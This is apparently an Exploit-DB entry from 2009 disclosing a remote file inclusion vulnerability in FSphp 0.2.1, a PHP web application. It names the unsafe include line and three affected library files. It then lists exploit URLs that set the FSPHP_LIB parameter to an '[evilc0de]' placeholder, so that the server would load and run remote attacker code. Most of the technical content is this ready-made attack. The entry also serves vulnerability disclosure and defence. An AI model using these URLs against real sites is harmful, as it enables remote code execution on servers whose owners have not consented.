FSphp 0.2.1 - Remote File Inclusion

EDB-ID:

9821

CVE:

N/A


Author:

NoGe

Type:

webapps


Platform:

PHP

Date:

2009-09-24


[o] FSphp 0.2.1 Multiple Remote File Inclusion Vulnerability
Software : FSphp version 0.2.1
Vendor   : http://fsphp.sourceforge.net/
Download : http://sourceforge.net/projects/fsphp/
Author   : NoGe
Home     : http://antisecurity.org/

[o] Vulnerable file
include_once $FSPHP_LIB . "/path.php" ;

lib/FSphp.php
lib/navigation.php
lib/pathwirte.php

[o] Exploit
http://localhost/[path]/lib/FSphp.php?FSPHP_LIB=[evilc0de]
http://localhost/[path]/lib/navigation.php?FSPHP_LIB=[evilc0de]
http://localhost/[path]/lib/pathwirte.php?FSPHP_LIB=[evilc0de]